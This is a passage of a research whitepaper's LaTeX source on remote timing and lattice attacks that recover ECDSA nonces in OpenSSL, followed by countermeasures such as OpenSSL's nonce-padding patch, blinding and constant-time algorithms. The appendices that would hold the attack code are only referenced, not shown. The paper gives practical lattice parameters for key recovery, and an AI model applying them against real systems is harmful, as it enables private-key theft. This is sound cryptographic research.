0\\ 1048 | 152 & 3 & 0\\ 1049 | 153 & 14 & 0\\ 1050 | 154 & 14 & 0\\ 1051 | 155 & 41 & 0\\ 1052 | 156 & 69 & 1\\ 1053 | 157 & 134 & 2\\ 1054 | 158 & 212& 4\\ 1055 | 159 & 388 & 7\\ 1056 | 160 & 721 & 14\\ 1057 | 161 & 1252 & 25\\ 1058 | 162 & 2150 & 43\\ 1059 | \bottomrule 1060 | \end{tabular} 1061 | \caption{Stats on the nonces that computed the fastest 5,000 signatures from 100,000 handshakes} 1062 | } 1063 | \end{table} 1064 | 1065 | To eliminate the false 
positives, the idea here is to select a random subset of, say, 42 tuples (if we are aiming for nonces smaller than 156 bits) and run the lattice attack; if it does not find anything, build another random subset of the same size. Rinse and repeat. This leads to more than $1.36 \times 10^{104}$ different combinations, which is infeasible, and this is because our timing measurements are not precise enough. With better measurements this attack would indeed be devastating.\\ 1066 | 1067 | From there, we can imagine many other ways to get better results. \textbf{Hardware time stamping} is done with special Network Interface Controllers (NIC), and allows us to get our TCP packets time stamped with nanosecond precision. Such an attack \href{https://vimeo.com/112575034}{was demonstrated last year by Paul McMillan} on an embedded device. It is a recent technology, mostly driven by the need of the Precision Time Protocol (PTP) for extra timing precision to synchronize clocks throughout a computer network. This approach was not researched by this paper but might lead to more precision in the attack.\\ 1068 | The two other obvious solutions would be to get as close as possible to the target (which we are already doing) and to collect more samples. After collecting 10 million signatures (the collection lasted more than 19 hours) we do indeed get better results, although still not exploitable as seen in the following tables and in figure \ref{fig:frequency_client}. Note that every experiment we did gave very different results and the numbers displayed in this paper should not be taken as an indication of general statistics.
1069 | 1070 | \begin{table}[H] 1071 | \parbox{.45\linewidth}{ 1072 | \centering 1073 | \begin{tabular}{@{} *3c @{}} 1074 | \toprule 1075 | length&amount&percentage\\ 1076 | \midrule 1077 | 150 & 1 & 2\\ 1078 | 153 & 2 & 4\\ 1079 | 154 & 1 & 2\\ 1080 | 155 & 1 & 2\\ 1081 | 156 & 3 & 6\\ 1082 | 157 & 4 & 8\\ 1083 | 158 & 5 & 10\\ 1084 | 159 & 5 & 10\\ 1085 | 160 & 11 & 22\\ 1086 | 161 & 6 & 12\\ 1087 | 162 & 11 & 22\\ 1088 | \bottomrule 1089 | \end{tabular} 1090 | \caption{Stats on the nonces that computed the fastest 50 signatures from 10 million handshakes} 1091 | } 1092 | \hfill 1093 | \parbox{.45\linewidth}{ 1094 | \centering 1095 | \begin{tabular}{@{} *3c @{}} 1096 | \toprule 1097 | length&amount&percentage\\ 1098 | \midrule 1099 | 149 & 1 & 1\\ 1100 | 150 & 1 & 1\\ 1101 | 152 & 3 & 3\\ 1102 | 153 & 8 & 8\\ 1103 | 154 & 1 & 1\\ 1104 | 155 & 3 & 3\\ 1105 | 156 & 5 & 5\\ 1106 | 157 & 6 & 6\\ 1107 | 158 & 10& 10\\ 1108 | 159 & 9 & 9\\ 1109 | 160 & 22 & 22\\ 1110 | 161 & 11 & 11\\ 1111 | 162 & 20 & 20\ 1112 | \bottomrule 1113 | \end{tabular} 1114 | \caption{Stats on the nonces that computed the fastest 100 signatures from 10 million handshake} 1115 | } 1116 | \end{table} 1117 | 1118 | \begin{figure}[H] 1119 | \includegraphics[width=\textwidth]{frequency_client.png} 1120 | \caption{The blue line represents the signatures generated with nonces of bitsize longer than 157 bits, the red line represents signatures correlated with nonces of bitsize inferior or equal to 157 bits.} 1121 | \label{fig:frequency_client} 1122 | \end{figure} 1123 | 1124 | \subsection{The Lattice Attack} 1125 | 1126 | Obviously our attack is not going to work from a remote machine because our timings are not correlated with the length of the nonces. We can try a theoretic attack by selecting the nonces by hand. 1127 | 1128 | The code for the lattice attack can be found in Appendix B, it uses \textbf{Sage} and the embedding strategy talked about earlier. 
1129 | 1130 | In our experiments, we cannot solve for nonces greater than 157 bits (6 bits known). LLL also often provides worse results than \textbf{BKZ}. BKZ is another algorithm that approximates a solution to the SVP; it uses LLL internally but ends up with a better-reduced basis most of the time. 1131 | 1132 | When only 6 bits are known, BKZ needs a minimum of 50 tuples (signatures and truncated hashes) to find the nonces, LLL needs 78. For nonces of 156 bits (7 bits are known), LLL needs a minimum of 42 tuples to find the values of the nonces whereas BKZ only needs 38. For nonces of bitsize 155, BKZ needs 30 tuples and LLL needs 31. 1133 | 1134 | \begin{figure}[H] 1135 | \includegraphics[width=\textwidth]{nice_web_plot.png} 1136 | \caption{The number of tuples needed by each algorithm (BKZ and LLL) according to the size of the nonces they can find} 1137 | \end{figure} 1138 | 1139 | As in similar attacks in the literature, we use $q / 2^{l + 1}$ (with $q$ the modulus and $l$ the number of known most significant bits (MSB)) for the trick in the embedding strategy. Using other values for the trick often provides worse results (more tuples are needed, or no solutions can be found), and if we do not use the extra dimension we cannot seem to find correct solutions. 1140 | 1141 | \section{Countermeasures} 1142 | 1143 | These kinds of ``relaxed'' attacks on DSA and ECDSA are even more problematic on smart-cards, embedded devices and other cryptographic devices that can leak way more information through many other kinds of side-channel analysis. But to attack a remote target, timing attacks are still one of the few reliable ways (along with the leak of information different error messages can give away). A relaxed remote attack model where the attacker shares the same machine as the victim can use such techniques as well.
Some research has been done in Hypervisors where you can access information about neighbor VM's memory use\cite{flushreload}\cite{flushreloadecdsa}\cite{flushreloadopenssl}. The questions of ``Are there other kinds of side-channel attacks on remote targets?'' and ``Can we get more accurate timings on the network?'' are still open. As for the way of preventing timing attacks, a lot of countermeasures already exist. 1144 | 1145 | \subsection{The OpenSSL Patch} 1146 | 1147 | Let's first take a look at the fix proposed by B.B.Brumley and N.Tuveri following their finding. 1148 | 1149 | \begin{figure}[H] 1150 | \begin{minted}[breaklines,frame=single]{C} 1151 | /* get random k */ 1152 | do 1153 | if (dgst != NULL) { 1154 | if (!BN_generate_dsa_nonce 1155 | (k, order, EC_KEY_get0_private_key(eckey), dgst, dlen, 1156 | ctx)) { 1157 | ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, 1158 | ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED); 1159 | goto err; 1160 | } 1161 | } else { 1162 | if (!BN_rand_range(k, order)) { 1163 | ECDSAerr(ECDSA_F_ECDSA_SIGN_SETUP, 1164 | ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED); 1165 | goto err; 1166 | } 1167 | } 1168 | while (BN_is_zero(k)); 1169 | 1170 | /* 1171 | * We do not want timing information to leak the length of k, so we 1172 | * compute G*k using an equivalent scalar of fixed bit-length. 1173 | */ 1174 | 1175 | if (!BN_add(k, k, order)) 1176 | goto err; 1177 | if (BN_num_bits(k) <= BN_num_bits(order)) 1178 | if (!BN_add(k, k, order)) 1179 | goto err; 1180 | 1181 | /* compute r the x-coordinate of generator * k */ 1182 | if (!EC_POINT_mul(group, tmp_point, k, NULL, NULL, ctx)) { 1183 | \end{minted} 1184 | \caption{the patch of B.B.Brumley and N.Tuveri in \textit{crypto/ecdsa/ecs\_ossl.c}} 1185 | \end{figure} 1186 | 1187 | The attack we presented works because some of the nonces are short enough. A solution could be to \textbf{make them all long enough} so that the underlying lattice attack could not happen. 
This is what B.B.Brumley and N.Tuveri proposed, and is facilitated by the properties of the scalar multiplication in Elliptic Curve Cryptography: 1188 | 1189 | $$ [k]P = [k + r]P \text{ if } r \text{ is a multiple of the group order} $$ 1190 | 1191 | As we will see later, this property is often used as \textbf{scalar blinding} against Side-Channel Attacks. But rather than using a random multiple of the group order, which would make extremely large nonces, we can just add the group order to the nonce once. If it's not long enough, the second test will add the group order once again. This will be enough to avoid short nonces all of the time. 1192 | 1193 | \subsection{Blinding} 1194 | 1195 | In 1996, Kocher\cite{Kocher} introduced a timing attack on Diffie-Hellman, RSA and DSA, along with a relevant countermeasure: \textbf{blinding}. He explained two ways of using it, either as a base blinding, or as an exponent blinding (although it was shown that under certain conditions exponent blinding alone was not sufficient\cite{schindler}). Both techniques allow the operation to be computed on something unrelated to a malicious user's controlled input.\\ 1196 | 1197 | Below is the \textbf{base blinding} technique applied during an RSA decryption phase with $m = c^d \mod{N}$ where $m$ is the message, $c$ is the ciphertext, $d$ is the private exponent and $N$ the modulus: 1198 | 1199 | \begin{enumerate} 1200 | \item{$r \xleftarrow[]{\$} \mathbb{Z}_N^{\ast}$} 1201 | \item{$m' = (c \cdot r^e)^d \pmod{N}$} 1202 | \item{$m = m' \cdot r^{-1} \pmod{N}$} 1203 | \end{enumerate} 1204 | 1205 | To harden base blinding, \textbf{exponent blinding} can be added.
Instead of randomizing the ciphertext, the idea is to randomize the private exponent by adding it to a multiple of $\varphi(N)$: 1206 | 1207 | \begin{enumerate} 1208 | \item{$k \xleftarrow[]{\$} \mathbb{Z}$} 1209 | \item{$d' = d + k \cdot \varphi(N)$} 1210 | \item{$m = c^{d'} \pmod{N}$} 1211 | \end{enumerate} 1212 | 1213 | In cryptosystems based on Elliptic Curve Cryptography, other forms of blinding can be used; we first re-introduce scalar blinding. Here in $Q = [d]P$ we have $P=(x,y)$: 1214 | 1215 | \textbf{Scalar blinding} is the ECC analogue of RSA exponent blinding: in $Q = [d]P$ you hide the private key by adding it to a multiple of the group order. 1216 | 1217 | \begin{enumerate} 1218 | \item{$k \xleftarrow[]{\$} \mathbb{Z}$} 1219 | \item{$d' = d + k \cdot \#E(\mathbb{F}_q)$ where $\#E(\mathbb{F}_q)$ is the order of the curve} 1220 | \item{$Q = [d']P$} 1221 | \end{enumerate} 1222 | 1223 | \textbf{Coordinate blinding} is another form of blinding that expresses the computation in different projective coordinates every time: 1224 | 1225 | \begin{enumerate} 1226 | \item{$k \xleftarrow[]{\$} \mathbb{Z}$} 1227 | \item{Compute $P = (kx, ky, k)$ expressed by projective coordinates.} 1228 | \item{Compute $[d]P$ using the scalar multiplication algorithm with projective coordinates on the Montgomery-form elliptic curve.} 1229 | \item{Output $[d]P$} 1230 | \end{enumerate} 1231 | 1232 | \textbf{Point blinding} is the ECC analogue of RSA base blinding: in $Q = [d]P$ you hide the base point $P$ by adding it to a random point: 1233 | 1234 | \begin{enumerate} 1235 | \item{$S \xleftarrow[]{\$} E(\mathbb{F}_q)$} 1236 | \item{Compute $S' = [d]S$} 1237 | \item{$Q' = [d](P + S)$} 1238 | \item{$Q = Q' - S'$} 1239 | \end{enumerate} 1240 | 1241 | \subsection{Constant-Time} 1242 | 1243 | Another popular way of preventing timing attacks is to use Constant-Time algorithms like we have seen with OpenSSL's ECDSA implementation for binary curves.
It is also often used for comparing MACs or signatures without leaking information about the bytes of the correct string, which a naive comparison does by failing as soon as a byte differs.\\ 1244 | 1245 | Constant-Time exponentiation in modular arithmetic based cryptosystems like DH is done with \textbf{Square-and-Multiply-Always}, which is a modified Square-and-Multiply algorithm that does both operations every time. Here we are decrypting a ciphertext $c$ with the operation $c^d \pmod{N}$ where $d$ is the private key, $|d|$ its binary length and $d_i$ the bit at position $i$ of its binary representation. 1246 | 1247 | \DontPrintSemicolon 1248 | \begin{algorithm}[H] 1249 | $s = 1$\; 1250 | \For{$i$ from $|d|-1$ down to $0$}{ 1251 | $s = s \cdot s \pmod{N}$ \; 1252 | \lIf{$d_i = 1$}{ 1253 | $s = s \cdot c \pmod{N}$ 1254 | } 1255 | \lElse{ 1256 | $t = s \cdot c \pmod{N}$ 1257 | } 1258 | } 1259 | return $s$\; 1260 | \end{algorithm} 1261 | 1262 | Constant-time scalar multiplication in ECC is done with the \textbf{Double-and-Add-Always} or the \textbf{Montgomery Ladder} algorithm, as in OpenSSL's ECDSA implementation for binary curves. Both follow the same idea as Square-and-Multiply-Always, where dummy operations are performed.\\ 1263 | Here is the Montgomery Ladder algorithm: 1264 | 1265 | \begin{algorithm}[H] 1266 | $R_0 = 0$\; 1267 | $R_1 = P$\; 1268 | \For{$i$ from $|d|-1$ down to $0$}{ 1269 | \uIf{$d_i = 0$}{ 1270 | $R_1 = R_0 + R_1$\; 1271 | $R_0 = 2R_0$\; 1272 | } 1273 | \Else{ 1274 | $R_0 = R_0 + R_1$\; 1275 | $R_1 = 2R_1$\; 1276 | } 1277 | } 1278 | return $R_0$\; 1279 | \end{algorithm} 1280 | 1281 | \subsection{Others} 1282 | 1283 | We will briefly talk about the other alternatives to the previous two popular ones.\\ 1284 | 1285 | The \textbf{Unified Formula} technique intends to make point addition and point doubling use the same sequence of field operations.
It was introduced by Brier and Joye in 2002\cite{unified} and aims to remove the difference between the operations performed for $P + Q$ and those performed when $P = Q$.\\ 1286 | 1287 | Another relatively new technique is the \textbf{Padding-Time} technique, which was introduced in 2015 by Boneh, Braun and Jana. The idea is to always take the same amount of time by waiting before doing anything else if an operation did not take as much time as the previous ones.\\ 1288 | 1289 | A totally different take on this problem is to get rid of the randomness of the nonces by \textbf{deterministically deriving the nonces from the message and some secret data}. There are two main propositions in this field: D.J.Bernstein's EdDSA\cite{eddsa}, which replaces ECDSA altogether (and uses different curves), and Thomas Pornin's\cite{pornin}, which keeps ECDSA but generates the nonces with HMAC. 1290 | 1291 | \section{Conclusion} 1292 | 1293 | We have seen in our own experiments that remote timing attacks are \textbf{far from being practical}, even in the same local network. It already takes advanced measures to attain high precision of timings on the attacker machine, and the fact that we cannot control the jitter, the propagation time and the overall server's responsiveness makes things extremely difficult for us.\\ 1294 | 1295 | Note that the lattice attack should still have \textbf{room for improvement}, and more resources would make the timing attack more efficient as well. The detailed and respected description of the TLS protocol would make such a potentially efficient attack particularly easy to perform against any TLS framework/library having such a vulnerability.\\ \href{http://blog.cryptographyengineering.com/2012/03/surviving-bad-rng.html}{Some cryptographers} have already advised not to use ECDSA to cryptographically sign objects.
The topic is currently a hot one on the \href{http://www.ietf.org/mail-archive/web/cfrg/current/maillist.html}{CFRG mailing list} as to which new signature scheme should become the standard in the years to come. 1296 | 1297 | \newpage 1298 | 1299 | \section*{Acknowledgements} 1300 | 1301 | This work would not have been possible without my two supervisors Tom Ritter and Guilhem Castagnos.\\ 1302 | I also want to thank B.B.Brumley and Paul McMillan for the discussions we had.\\ 1303 | Finally many thanks for the awesome feedback on this whitepaper from Paul Kocher, Brendan McMillion, Christian Belin, Mark Carney, Eloi Vanderbeken and MigMigg. 1304 | 1305 | \newpage 1306 | 1307 | \begin{thebibliography}{1} 1308 | 1309 | \bibitem{ps3} PS3 Nonce Re-use {\em http://www.bbc.com/news/technology-12116051} 1310 | 1311 | \bibitem{Kocher} Paul C. Kocher {\em Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems} 1312 | 1313 | \bibitem{brumley-tuveri} B.B.Brumley and N.Tuveri {\em Remote Timing Attacks are Still Practical} 1314 | 1315 | \bibitem{boneh-venkatesan} D. Boneh and R. Venkatesan {\em Hardness of computing the most significant bits of secret keys in Diffie-Hellman and related schemes} 1316 | 1317 | \bibitem{vanstone} Harper, Menezes, Vanstone {\em Public-Key Cryptosystems with Very Small Key Lengths} 1318 | 1319 | \bibitem{HG-smart} N.A.Howgrave-Graham and N.P.Smart {\em Lattice Attacks on DSA} 1320 | 1321 | \bibitem{dualec} Daniel J. Bernstein, Tanja Lange, and Ruben Niederhagen {\em Dual EC: A Standardized Back Door} 1322 | 1323 | \bibitem{babai} László Babai {\em On Lovász' lattice reduction and the nearest lattice point problem} 1324 | 1325 | \bibitem{crosby} Scott A. Crosby, Dan S. Wallach, and Rudolf H.
Riedi {\em Opportunities and Limits of Remote Timing Attacks} 1326 | 1327 | \bibitem{chrispeikert} Chris Peikert {\em Lattices in Cryptography, Georgia Tech, Fall 2013: Lecture 2, 3} 1328 | 1329 | \bibitem{logjam} David Adrian, Karthikeyan Bhargavan, J. Alex Halderman, Nadia Heninger, Benjamin VanderSloot, Eric Wustrow, Zakir Durumeric, Pierrick Gaudry, Matthew Green, Drew Springall, Emmanuel Thomé, Luke Valenta, Santiago Zanella-Béguelin, Paul Zimmermann {\em Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice} 1330 | 1331 | \bibitem{coppersmith} Don Coppersmith {\em Finding Small Solutions to Small Degree Polynomials} 1332 | 1333 | \bibitem{lll} Lenstra, A. K.; Lenstra, H. W., Jr.; Lovász, L. (1982). {\em "Factoring polynomials with rational coefficients"} 1334 | 1335 | \bibitem{flushreload} Yarom, Falkner {\em FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack} 1336 | 1337 | \bibitem{ecdsa} Johnson, Menezes, Vanstone {\em The Elliptic Curve Digital Signature Algorithm (ECDSA)} 1338 | 1339 | \bibitem{flushreloadecdsa} Benger, van de Pol, Smart, Yarom {\em “Ooh Aah...
Just a Little Bit” : A small amount of side channel can go a long way} 1340 | 1341 | \bibitem{flushreloadopenssl} Yarom, Benger {\em Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack} 1342 | 1343 | \bibitem{schnorr} Schnorr (1989) {\em Efficient Identification and Signatures for Smart Cards} 1344 | 1345 | \bibitem{schindler} Werner Schindler {\em Exclusive Exponent Blinding May Not Suffice to Prevent Timing Attacks on RSA} 1346 | 1347 | \bibitem{pornin} Thomas Pornin {\em Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)} 1348 | 1349 | \bibitem{eddsa} D.J.Bernstein {\em High-speed high-security signatures} 1350 | 1351 | \bibitem{unified} Brier, Joye {\em Weierstraß elliptic curves and side-channel attacks} 1352 | 1353 | \end{thebibliography} 1354 | 1355 | \newpage 1356 | 1357 | \appendix 1358 | 1359 | \section{Timing Attack in C} 1360 | 1361 | \inputminted[breaklines]{c}{attack.c} 1362 | 1363 | \newpage 1364 | 1365 | \section{Lattice Attack in Sage} 1366 | 1367 | \inputminted[breaklines]{sage}{lattice.sage} 1368 | 1369 | \end{document} --------------------------------------------------------------------------------